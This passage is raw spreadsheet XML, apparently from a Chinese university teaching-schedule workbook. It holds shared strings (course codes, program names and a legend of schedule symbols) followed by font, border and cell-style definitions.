    <t xml:space="preserve">080913</t>
  </si>
  <si>
    <t xml:space="preserve">080921</t>
  </si>
  <si>
    <t xml:space="preserve">080922</t>
  </si>
  <si>
    <t xml:space="preserve">080931</t>
  </si>
  <si>
    <t xml:space="preserve">080932</t>
  </si>
  <si>
    <t xml:space="preserve">080941</t>
  </si>
  <si>
    <t xml:space="preserve">080942</t>
  </si>
  <si>
    <t xml:space="preserve">080951</t>
  </si>
  <si>
    <t xml:space="preserve">080952</t>
  </si>
  <si>
    <t xml:space="preserve">081011</t>
  </si>
  <si>
    <t xml:space="preserve">081111</t>
  </si>
  <si>
    <t xml:space="preserve">081112</t>
  </si>
  <si>
    <t xml:space="preserve">081113</t>
  </si>
  <si>
    <t xml:space="preserve">081121</t>
  </si>
  <si>
    <t xml:space="preserve">081122</t>
  </si>
  <si>
    <t xml:space="preserve">081211</t>
  </si>
  <si>
    <t xml:space="preserve">081212</t>
  </si>
  <si>
    <t xml:space="preserve">081213</t>
  </si>
  <si>
    <t xml:space="preserve">081214</t>
  </si>
  <si>
    <t xml:space="preserve">081215</t>
  </si>
  <si>
    <t xml:space="preserve">081216</t>
  </si>
  <si>
    <t xml:space="preserve">081231</t>
  </si>
  <si>
    <t xml:space="preserve">081232</t>
  </si>
  <si>
    <t xml:space="preserve">081233</t>
  </si>
  <si>
    <t xml:space="preserve">081234</t>
  </si>
  <si>
    <t xml:space="preserve">081241</t>
  </si>
  <si>
    <t xml:space="preserve">081242</t>
  </si>
  <si>
    <t xml:space="preserve">081411</t>
  </si>
  <si>
    <t xml:space="preserve">081421</t>
  </si>
  <si>
    <t xml:space="preserve">081422</t>
  </si>
  <si>
    <t xml:space="preserve">081431</t>
  </si>
  <si>
    <t xml:space="preserve">081441</t>
  </si>
  <si>
    <t xml:space="preserve">081442</t>
  </si>
  <si>
    <t xml:space="preserve">081451</t>
  </si>
  <si>
    <t xml:space="preserve">081452</t>
  </si>
  <si>
    <t xml:space="preserve">081511</t>
  </si>
  <si>
    <t xml:space="preserve">081512</t>
  </si>
  <si>
    <t xml:space="preserve">081513</t>
  </si>
  <si>
    <t xml:space="preserve">081514</t>
  </si>
  <si>
    <t xml:space="preserve">081515</t>
  </si>
  <si>
    <t xml:space="preserve">081516</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">国际经济与贸易</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">05</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">082211</t>
  </si>
  <si>
    <t xml:space="preserve">082212</t>
  </si>
  <si>
    <t xml:space="preserve">082213</t>
  </si>
  <si>
    <t xml:space="preserve">082214</t>
  </si>
  <si>
    <t xml:space="preserve">082241</t>
  </si>
  <si>
    <t xml:space="preserve">082242</t>
  </si>
  <si>
    <t xml:space="preserve">90</t>
  </si>
  <si>
    <t xml:space="preserve">空乘（专科）</t>
  </si>
  <si>
    <t xml:space="preserve">089311</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">符号说明：□ 理论课     ∈专业课设     </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">Ω</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">专业实践    ※ 技能训练      </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color rgb="FF008000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">-</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color rgb="FF008000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">机原、机零  </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    ★专业实习     </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">Z </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">电子实习    </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">基础课设                              ∝创新实践        </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">/ </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">金工实习       </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">T</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">教学实习        </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color rgb="FFFF0000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">∷ 考试</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color rgb="FFFF0000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">///</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color rgb="FFFF0000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">毕业实习</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">       </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">*</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">社会调查      </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">Y</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">艺术实践        </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">X</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">写生  </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">C</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">机器测绘
</t>
    </r>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="4">
    <numFmt numFmtId="164" formatCode="General"/>
    <numFmt numFmtId="165" formatCode="@"/>
    <numFmt numFmtId="166" formatCode="d"/>
    <numFmt numFmtId="167" formatCode="[$-1E000804]m;@"/>
  </numFmts>
  <fonts count="7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9"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="14"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="14"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="9"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="6"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="9"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="6"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="7.5"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="7.5"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="7.5"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="7.5"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="7.5"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="7.5"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF33CCCC"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="7.5"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="6.5"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="6"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="6.5"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8.5"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8.5"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="8.5"/>
      <color rgb="FFFF0000"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="16"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="16"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="11"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="11"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFFFFFF"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10.5"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10.5"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF008000"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF008000"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FFFF0000"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FFFF0000"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="DejaVu Sans"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="2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s>
  <borders count="5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dashed"/>
      <diagonal/>
    </border>
    <border diagonalUp="false" diagonalDown="false">
      <left style="thin"/>
      <right style="dotted"/>
      <top style="dashed"/>
      <bottom style="dashed"/>
      <diagonal/>
    </border>
    <border diagonalUp="false" diagonalDown="false">
      <left style="thin"/>
      <right style="dashed"/>
      <top style="dashed"/>
      <bottom style="double"/>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style="dashed"/>
      <right style="dashed"/>
      <top style="double"/>
      <bottom style="dashed"/>
      <diagonal/>
    </border>
    <border diagonalUp="false" diagonalDown="false">
      <left style="dashed"/>
      <right style="thin"/>
      <top style="double"/>
      <bottom style="dashed"/>
      <diagonal/>
    </border>
    <border diagonalUp="false" diagonalDown="false">
      <left/>
      <right style="thin"/>
      <top style="dashed"/>
      <bottom/>
      <diagonal/>
    </border>
    <border diagonalUp="false" diagonalDown="false">
      <left style="dashed"/>
      <right style="dashed"/>
      <top style="dashed"/>
      <bottom style="double"/>
      <diagonal/>
    </border>
    <border diagonalUp="false" diagonalDown="false">
      <left style="dashed"/>
      <right style="thin"/>
      <top style="dashed"/>
      <bottom style="double"/>
      <diagonal/>
    </border>
    <border diagonalUp="false" diagonalDown="false">
      <left style="thin"/>
      <right style="dashed"/>
      <top style="double"/>
      <bottom style="dashed"/>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1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top" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="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11" borderId="11" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="22" fillId="11" borderId="11" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="22" fillId="11" borderId="11" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="23" fillId="3" borderId="11" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="23" fillId="3" borderId="11" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="23" fillId="3" borderId="11" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="24" fillId="11" borderId="12" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="24" fillId="11" borderId="12" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="24" fillId="11" borderId="12" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="25" fillId="12" borderId="0" applyFont="true" applyBorder="false" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="25" fillId="12" borderId="0" applyFont="true" applyBorder="false" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="25" fillId="12" borderId="0" applyFont="true" applyBorder="false" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="26" fillId="0" borderId="13" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="26" fillId="0" borderId="13" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="26" fillId="0" borderId="13" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="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97" applyFont="true" applyBorder="false" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="165" fontId="9" fillId="0" borderId="0" xfId="97" applyFont="false" applyBorder="false" applyAlignment="false" applyProtection="false">
      <alignment horizontal="general" vertical="top" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="9" fillId="0" borderId="0" xfId="97" applyFont="false" applyBorder="false" applyAlignment="false" applyProtection="false">
      <alignment horizontal="general" vertical="top" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="165" fontId="0" fillId="0" borderId="0" xfId="97" applyFont="true" applyBorder="false" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="9" fillId="0" borderId="0" xfId="125" applyFont="true" applyBorder="false" applyAlignment="false" applyProtection="false">
      <alignment horizontal="general" vertical="top" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="165" fontId="27" fillId="0" borderId="0" xfId="97" applyFont="true" applyBorder="false" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="28" fillId="0" borderId="0" xfId="96" applyFont="true" applyBorder="true" applyAlignment="false" applyProtection="false">
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="8" fillId="0" borderId="0" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="8" fillId="0" borderId="0" xfId="96" applyFont="true" applyBorder="false" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="8" fillId="0" borderId="0" xfId="96" applyFont="true" applyBorder="false" applyAlignment="false" applyProtection="false">
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="29" fillId="0" borderId="14" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="31" fillId="0" borderId="15" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="32" fillId="0" borderId="16" xfId="96"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32" fillId="0" borderId="19" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="top" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="31" fillId="0" borderId="18" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="tru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21" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="tru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64" fontId="31" fillId="0" borderId="18" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="top" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="34" fillId="0" borderId="19" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="top" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="166" fontId="35" fillId="0" borderId="19" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="166" fontId="35" fillId="0" borderId="15" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="31" fillId="0" borderId="15" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="36" fillId="0" borderId="23" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="36" fillId="0" borderId="19" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="36" fillId="0" borderId="24" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="166" fontId="35" fillId="0" borderId="22" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="37" fillId="0" borderId="19" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="32" fillId="0" borderId="20" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="top" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="35" fillId="0" borderId="15" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="38" fillId="0" borderId="19" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="38" fillId="0" borderId="19" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="38" fillId="0" borderId="24" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="34" fillId="0" borderId="21" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="top" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="35" fillId="0" borderId="25" xfId="96"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23" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="0" borderId="18" xfId="0" applyFont="true" applyBorder="true" applyAlignment="false" applyProtection="false">
      <alignment horizontal="general"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5" fontId="39" fillId="0" borderId="18" xfId="0" applyFont="true" applyBorder="true" applyAlignment="false" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="165" fontId="39" fillId="0" borderId="26" xfId="0" applyFont="true" applyBorder="true" applyAlignment="false" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="165" fontId="40" fillId="0" borderId="15" xfId="0" applyFont="true" applyBorder="true" applyAlignment="false" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="165" fontId="40" fillId="0" borderId="18" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="36" fillId="0" borderId="27" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="36" fillId="0" borderId="28" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="36" fillId="0" borderId="29" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="41" fillId="0" borderId="15" xfId="96" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="165" fontId="42" fillId="0" borderId="18" xfId="0" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
